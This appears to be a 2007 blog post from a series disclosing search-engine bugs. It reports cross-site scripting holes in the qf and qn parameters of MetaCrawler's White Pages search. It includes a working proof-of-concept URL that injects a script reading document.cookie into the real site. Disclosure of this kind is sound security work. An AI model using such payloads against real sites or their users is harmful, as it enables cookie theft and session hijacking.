MOSEB-13: Vulnerabilities at metacrawler.com

22:41 13.06.2007

Next participant of the project is MetaCrawler search engine. It is one of the popular meta search engines.

The vulnerabilities are at MetaCrawler (www.metacrawler.com) in White Pages search. These Cross-Site Scripting holes I found 27.05.2007.

XSS:

The vulnerabilities are in qf and qn parameters:
http://www.metacrawler.com/info.metac/white-pages/message.htm?otmpl=/white-pages/results.htm&qf=%3Cscript%3Ealert(document.cookie)%3C/script%3E&searchtype=citystate

Moral: searching in white pages can be dangerous.

Note, that MetaCrawler engine belongs to InfoSpace, Inc. So they also responsible for these vulnerabilities. And don’t worry guys, InfoSpace will also be in MOSEB.


Leave a Reply

You must be logged in to post a comment.